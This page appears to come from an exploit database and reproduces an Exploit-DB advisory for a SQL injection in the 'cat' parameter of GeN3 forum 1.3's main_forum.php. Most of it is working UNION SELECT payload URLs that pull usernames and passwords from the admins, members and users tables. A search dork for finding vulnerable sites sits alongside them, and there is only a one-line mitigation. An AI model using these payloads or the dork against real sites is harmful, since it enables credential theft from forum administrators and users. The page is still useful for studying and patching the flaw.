header-logo
Suggest Exploit
vendor:
GeN3 Version 1.3
by:
Dr.0rYX & Cr3w-DZ
N/A
CVSS
N/A
SQL injection
N/A
CWE
Product Name: GeN3 Version 1.3
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
N/A

GeN3 forum V1.3 SQL injection vulnerability

The vulnerability exists in the 'main_forum.php' file, which allows an attacker to inject malicious SQL queries via the 'cat' parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can be done by sending an HTTP request with a malicious 'cat' parameter value, such as '-1+Union+ALL+Select+1,group_concat(aId,0x3a,aUsername,0x3a,apassword),3,4,5,6,7+FROM+admins--' or '-1+Union+ALL+Select+1,group_concat(mId,0x3a,mUsername,0x3a,mpassword),3,4,5,6,7+FROM+members--'

Mitigation:

The vendor should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

# Author: Dr.0rYX & Cr3w-DZ
# Software Link: http://www.ptcpay.com/shop/browse_products.php
###############################


         NN         N     AAAAAA     SSSSSSSSS
         NNN       N   A           A    S
         N NN      N   A           A    S
         N  NN     N   A           A    S                        TTTTTT   EEEEE    AAAA    MM   MM
         N   NN    N   AAAAAAAA    SSSSSSSSS              TT      E         A      A   M M M M
         N     NN  N   A           A                   S             TT      E         A       A  M  M   M
         N      NN N   A           A                   S             TT      EEEE    AAAAAA  M       M
         N       NNN   A           A                   S             TT      E         A       A  M       M
         N        NN   A            A                   S             TT      E         A       A  M       M
         N          N   A            A    SSSSSSSSS             TT      EEEEE   A       A  M       M


                                                               ALGERIAN HACKER
                **********************- NORTH-AFRICA SECURITY TEAM -***********************

  [!]            GeN3 forum V1.3 SQL injection vulnerability
  [!] Author    : Dr.0rYX & Cr3w-DZ
  [!] MAIL      : vx3@hotmail.de  &  Cr3w@hotmail.de

  ***************************************************************************/

  [ Software Information ]

  [+] Vendor : http://www.ptcpay.com
  [+] script   : GeN3 Version 1.3
  [+] Download : http://www.ptcpay.com/shop/browse_products.php
  [+] Version() : 1.3
  [+] Vulnerability : SQL injection
  [+] Dork :inurl:"main_forum.php?cat="

  **************************************************************************/
  [ Vulnerable File ]

  http://server/path/main_forum.php?cat=[N.A.S.T ]

  [ Exploit ]

  http://server/forum/main_forum.php?cat=-1+Union+ALL+Select+1,group_concat(aId,0x3a,aUsername,0x3a,apassword),3,4,5,6,7+FROM+admins--

  http://server/forum/main_forum.php?cat=-1+Union+ALL+Select+1,group_concat(userid,0x3a,Username,0x3a,password),3,4,5,6,7+FROM+users--

  [  GReet ]

  [+] :Cr3W-DZ , xcv-dz , CLAW , kader11000 , exploit-db.com , ALL HACKERS MUSLIMS

Navigation

Suggest Exploit

Services By CQR